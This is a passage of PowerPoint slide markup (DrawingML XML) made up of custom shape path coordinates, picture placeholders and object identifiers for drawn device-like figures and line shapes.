                    <a:pt x="153920" y="751668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="749750"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="740171"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147103" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="747106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="740171"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="153920" y="747106"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147103" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="748404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="747106"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="190331" y="740171"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153920" y="740171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153920" y="747106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190331" y="740171"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="569241" y="737255"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="738498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569241" y="737255"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="579106" y="737255"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="569241" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="745505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="737255"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="562343" y="735513"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="738498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567973" y="737483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="735513"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="562343" y="729503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="735513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567973" y="737483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="729503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="579106" y="729503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="562343" y="729503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567973" y="737483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569241" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="737255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="729503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="492302" y="693222"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441472" y="693222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446135" y="693466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443759" y="694021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="735513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562343" y="729503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="729503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579106" y="723552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492302" y="693222"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="676732" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="118962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="711758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33716" y="729098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127086" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38884" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33618" y="712100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36386" y="711620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26712" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12215" y="699186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="699186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9833" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="126003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56817" y="126003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675030" y="17320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672840" y="16469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="16469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="13593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676732" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="239983" y="713648"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="233166" y="714947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239983" y="713648"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="249930" y="713648"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239983" y="713648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="721883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="713648"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="249930" y="684545"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="233166" y="684545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242981" y="692805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="694507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="714947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239983" y="713648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="713648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="684545"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="36386" y="711620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="33618" y="712100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38884" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36386" y="711620"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="249930" y="674589"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36386" y="711620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38884" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127086" y="712905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="694507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="684545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="684545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249930" y="674589"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="12215" y="699186"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16763" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="701525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12215" y="699186"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="701525"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16763" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26712" y="706643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="701525"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="699186"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12215" y="699186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="701525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="699186"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="694928" y="594470"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412994" y="644759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412994" y="701208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443759" y="694021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441472" y="693222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492302" y="693222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484917" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419476" y="682483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="680081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422849" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="651779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469100" y="651779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="608508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="594470"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="233166" y="684545"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="233166" y="694507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242981" y="692805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233166" y="684545"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="441472" y="693222"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="443759" y="694021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446135" y="693466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441472" y="693222"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="429758" y="680081"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="419476" y="682483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="680081"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="444703" y="676590"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429758" y="680081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484917" y="690641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444703" y="676590"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="429758" y="651779"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422849" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="658797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="651779"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="429758" y="658797"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422849" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="660029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="658797"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="469100" y="651779"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429758" y="651779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429758" y="658797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469100" y="651779"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="701836" y="593238"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="594470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701836" y="593238"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="711691" y="593238"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="701836" y="593238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="601488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="593238"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="694928" y="25058"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="594470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701836" y="593238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="593238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700272" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="25058"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="126003"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9833" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="133045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="126003"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="16763" y="133045"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9833" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="134263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="133045"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="56817" y="126003"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16763" y="126003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16763" y="133045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56817" y="126003"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="694928" y="19324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="25058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700272" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="19324"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="711691" y="19324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="694928" y="19324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700272" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="27137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="19324"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="711691" y="16469"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="672840" y="16469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677331" y="16916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675030" y="17320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="25058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694928" y="19324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="19324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711691" y="16469"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="808354">
                  <a:moveTo>
                    <a:pt x="672840" y="16469"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="675030" y="17320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677331" y="16916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672840" y="16469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5" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{434786F7-D224-22B9-CFED-9D2CBC66700F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25630" y="2858289"/>
              <a:ext cx="527292" cy="534920"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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905BE718-DEFF-BA1F-CCFF-D4E336FC716D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2761335" y="2930004"/>
              <a:ext cx="447040" cy="269875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="397954" y="141566"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="396227" y="132588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="208788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="217766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397954" y="141566"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="407085" y="72986"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="405396" y="64008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="140208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701" y="149186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407085" y="72986"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="443661" y="111086"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441960" y="102108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="185928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714" y="194906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443661" y="111086"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="443661" y="88226"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441960" y="79248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="163068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714" y="172046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443661" y="88226"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="443674" y="184238"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441947" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="260604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="269582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443674" y="184238"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="447039" h="269875">
                  <a:moveTo>
                    <a:pt x="446722" y="8978"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="444995" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048" y="85344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4775" y="94322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446722" y="8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7" name="object 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47783483-F740-CA97-F47C-06AEE53AF34D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12928" y="3595179"/>
              <a:ext cx="1146369" cy="96316"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="object 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A8470BC-A2D0-F5D9-A6BB-BA3FA03679C3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06568" y="3776875"/>
              <a:ext cx="242749" cy="215645"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF0CDEF-FE32-41D1-C0E5-6F94C929A2AA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52714" y="3518048"/>
              <a:ext cx="650626" cy="961390"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50" name="object 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59E76C9D-1748-41B5-AAEA-9BBBE6D5E737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82061" y="3748300"/>
              <a:ext cx="694001" cy="797050"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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61599BAE-9C5E-47E8-6B73-0EFD4C55E14C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1482061" y="3748300"/>
              <a:ext cx="694055" cy="797560"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="694055" h="797560">
                  <a:moveTo>
                    <a:pt x="561593" y="742948"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261772" y="797050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136974" y="755140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136974" y="737614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236660" y="718564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236660" y="679702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26633" y="717040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="706372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666607" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694001" y="10667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694001" y="597406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410922" y="648460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410922" y="687322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435273" y="681988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561593" y="726946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561593" y="742948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2" name="object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF867EB0-BDB0-47BF-A8CE-A03C276A64ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1617513" y="4481343"/>
              <a:ext cx="125095" cy="66040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="125094" h="66039">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="19049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124798" y="65531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124798" y="4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0AA69F24-33F3-CC40-B0AD-49CED6DD89AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1743833" y="4475247"/>
              <a:ext cx="297815" cy="68580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="297814" h="68579">
                  <a:moveTo>
                    <a:pt x="297538" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="53339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="68579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297538" y="13715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29753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id="{3F972158-64A8-82AA-8199-B4FEFCA71087}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1717961" y="4411239"/>
              <a:ext cx="36830" cy="74930"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="74929">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="64769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36526" y="74675"/>
                  </a:lnTo>
                  <a:lnTo>
